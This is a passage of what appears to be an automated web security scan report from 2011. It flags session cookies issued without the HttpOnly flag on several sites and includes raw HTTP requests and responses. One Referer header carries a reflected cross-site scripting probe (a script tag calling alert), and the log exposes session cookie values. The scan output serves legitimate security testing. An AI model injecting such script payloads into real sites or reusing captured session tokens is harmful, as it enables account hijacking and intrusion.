Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=52553368C42DAFBB851AEBDA5EF760BB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Sat, 23 Jul 2011 13:48:55 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_10671987");

11.5. http://games.myyearbook.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
mcim=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:00:15 GMT; path=/; domain=.myyearbook.com
navbar-click=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.6. http://games.myyearbook.com/landing/pool previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.myyearbook.com
Path:	/landing/pool

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
mcim=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:41:29 GMT; path=/; domain=.myyearbook.com
navbar-click=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.7. http://hipservice.live.com/gethip.srf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://hipservice.live.com
Path:	/gethip.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HIPSession=41mWBOemPC4NZ9mfMNJAeqsJaqNNeXl*HshHpqa5B4vSZlDVTkGlFo4D5gXJ4tj8JD2vxoQ!ZeLZWAPWKE9iA1jWY!YWMvFRzag8kQV93cifQ$; domain=.live.com;path=/;version=1

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.8. http://home.myyearbook.com/Countries previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/Countries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.9. http://home.myyearbook.com/feed/giftFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/giftFeedItems

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.10. http://home.myyearbook.com/feed/myMagFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/myMagFeedItems

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.11. http://home.myyearbook.com/feed/tvFeedItems previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://home.myyearbook.com
Path:	/feed/tvFeedItems

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.12. http://members.boston.com/reg/rdb.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://members.boston.com
Path:	/reg/rdb.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=73f65691a24116258f49cb7163ab; Path=/reg
TSd00410=3561be1f34eb6bb030ab115b0b08850f5b813fc4aa03e05a4e2ad0bd; Path=/
TS2ea914=3561be1f34eb6bb030ab115b0b08850f5b813fc4aa03e05a4e2ad0bd; Path=/reg

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reg/rdb.do HTTP/1.1
Host: members.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; bcpage=6; RMFD=011QkcXHO1060Og; sslife=1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Set-Cookie: JSESSIONID=73f65691a24116258f49cb7163ab; Path=/reg
Content-Type: image/gif
Date: Sat, 23 Jul 2011 13:46:37 GMT
Set-Cookie: TSd00410=3561be1f34eb6bb030ab115b0b08850f5b813fc4aa03e05a4e2ad0bd; Path=/
Set-Cookie: TS2ea914=3561be1f34eb6bb030ab115b0b08850f5b813fc4aa03e05a4e2ad0bd; Path=/reg
Content-Length: 43

GIF89a.............!.......,........@..D..;

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AC7D1A685709A0A4858963A4C5358DAE; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140 HTTP/1.1
Host: ots.optimize.webtrends.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/Support.aspx
Cookie: JSESSIONID=A92903F890A6DDEB88E95360ABAD9B10

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:38:22 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AC7D1A685709A0A4858963A4C5358DAE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=1AD855EF978D202937F4C0AC11C0AEE3; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:42:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1AD855EF978D202937F4C0AC11C0AEE3; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 23025

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A92903F890A6DDEB88E95360ABAD9B10; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5 HTTP/1.1
Host: ots.optimize.webtrends.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: JSESSIONID=0F965E5297F4C2B170C27D877BBDA9C9

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:34:53 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Length: 410
Set-Cookie: JSESSIONID=A92903F890A6DDEB88E95360ABAD9B10; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe769